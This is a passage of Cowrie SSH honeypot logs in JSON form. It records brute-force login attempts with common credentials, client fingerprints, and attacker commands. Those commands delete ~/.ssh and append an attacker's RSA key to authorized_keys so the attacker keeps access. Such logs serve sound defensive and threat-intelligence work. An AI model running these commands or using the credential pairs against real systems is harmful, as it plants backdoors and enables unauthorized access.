fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:16:18.162155Z","src_ip":"212.227.235.229","session":"f9d9d7f1e5f7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:16:18.457908Z","src_ip":"212.227.235.229","session":"2b0d4f6d9b9d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:16:20.003343Z","src_ip":"212.227.235.229","session":"2b0d4f6d9b9d"}
{"eventid":"cowrie.login.failed","username":"sales","password":"sales","message":"login attempt [sales/sales] failed","sensor":"my-vps","timestamp":"2025-08-26T04:16:20.470914Z","src_ip":"212.227.235.229","session":"f9d9d7f1e5f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36126,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7faee1c9e01","protocol":"ssh","message":"New connection: 212.227.235.229:36126 (1.2.3.4:22) [session: a7faee1c9e01]","sensor":"my-vps","timestamp":"2025-08-26T04:16:21.624433Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:16:21.625382Z","src_ip":"212.227.235.229","session":"a7faee1c9e01"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:21.735626Z","src_ip":"212.227.235.229","session":"f9d9d7f1e5f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:16:21.902619Z","src_ip":"212.227.235.229","session":"a7faee1c9e01"}
{"eventid":"cowrie.login.success","username":"root","password":"traffic","message":"login attempt [root/traffic] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:16:23.019862Z","src_ip":"212.227.235.229","session":"a7faee1c9e01"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-26T04:16:23.333133Z","src_ip":"212.227.235.229","session":"2b0d4f6d9b9d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:16:23.646186Z","src_ip":"212.227.235.229","session":"a7faee1c9e01"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:16:23.646993Z","src_ip":"212.227.235.229","session":"a7faee1c9e01"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:16:23.648314Z","src_ip":"212.227.235.229","session":"a7faee1c9e01"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:23.927649Z","src_ip":"212.227.235.229","session":"a7faee1c9e01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48112,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fc74f3a3d3d","protocol":"ssh","message":"New connection: 212.227.235.229:48112 (1.2.3.4:22) [session: 1fc74f3a3d3d]","sensor":"my-vps","timestamp":"2025-08-26T04:16:24.067581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:16:24.069403Z","src_ip":"212.227.235.229","session":"1fc74f3a3d3d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:16:24.321399Z","src_ip":"212.227.235.229","session":"1fc74f3a3d3d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:16:24.501590Z","src_ip":"212.227.235.229","session":"a7faee1c9e01"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:16:24.502413Z","src_ip":"212.227.235.229","session":"a7faee1c9e01"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:16:24.782974Z","src_ip":"212.227.235.229","session":"a7faee1c9e01"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:24.783888Z","src_ip":"212.227.235.229","session":"a7faee1c9e01"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:24.882007Z","src_ip":"212.227.235.229","session":"2b0d4f6d9b9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36142,"dst_ip":"1.2.3.4","dst_port":22,"session":"c222864aa5d8","protocol":"ssh","message":"New connection: 212.227.235.229:36142 (1.2.3.4:22) [session: c222864aa5d8]","sensor":"my-vps","timestamp":"2025-08-26T04:16:25.068529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:16:25.069192Z","src_ip":"212.227.235.229","session":"c222864aa5d8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:16:25.355865Z","src_ip":"212.227.235.229","session":"c222864aa5d8"}
{"eventid":"cowrie.login.failed","username":"user","password":"password","message":"login attempt [user/password] failed","sensor":"my-vps","timestamp":"2025-08-26T04:16:25.993266Z","src_ip":"212.227.235.229","session":"1fc74f3a3d3d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:16:26.544185Z","src_ip":"212.227.235.229","session":"c222864aa5d8"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":35212,"dst_ip":"1.2.3.4","dst_port":22,"session":"36959cbd039e","protocol":"ssh","message":"New connection: 103.217.145.104:35212 (1.2.3.4:22) [session: 36959cbd039e]","sensor":"my-vps","timestamp":"2025-08-26T04:16:27.186643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:16:27.187737Z","src_ip":"103.217.145.104","session":"36959cbd039e"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:27.281071Z","src_ip":"212.227.235.229","session":"1fc74f3a3d3d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:16:27.460967Z","src_ip":"103.217.145.104","session":"36959cbd039e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48114,"dst_ip":"1.2.3.4","dst_port":22,"session":"25d3942b0031","protocol":"ssh","message":"New connection: 212.227.235.229:48114 (1.2.3.4:22) [session: 25d3942b0031]","sensor":"my-vps","timestamp":"2025-08-26T04:16:27.667762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:16:27.682005Z","src_ip":"212.227.235.229","session":"25d3942b0031"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:27.833102Z","src_ip":"212.227.235.229","session":"c222864aa5d8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:16:27.926726Z","src_ip":"212.227.235.229","session":"25d3942b0031"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37456,"dst_ip":"1.2.3.4","dst_port":22,"session":"b265e3c9054c","protocol":"ssh","message":"New connection: 212.227.235.229:37456 (1.2.3.4:22) [session: b265e3c9054c]","sensor":"my-vps","timestamp":"2025-08-26T04:16:28.117663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:16:28.118578Z","src_ip":"212.227.235.229","session":"b265e3c9054c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:16:28.403971Z","src_ip":"212.227.235.229","session":"b265e3c9054c"}
{"eventid":"cowrie.login.failed","username":"office","password":"office123","message":"login attempt [office/office123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:16:28.595518Z","src_ip":"103.217.145.104","session":"36959cbd039e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:16:29.588362Z","src_ip":"212.227.235.229","session":"b265e3c9054c"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:29.871564Z","src_ip":"103.217.145.104","session":"36959cbd039e"}
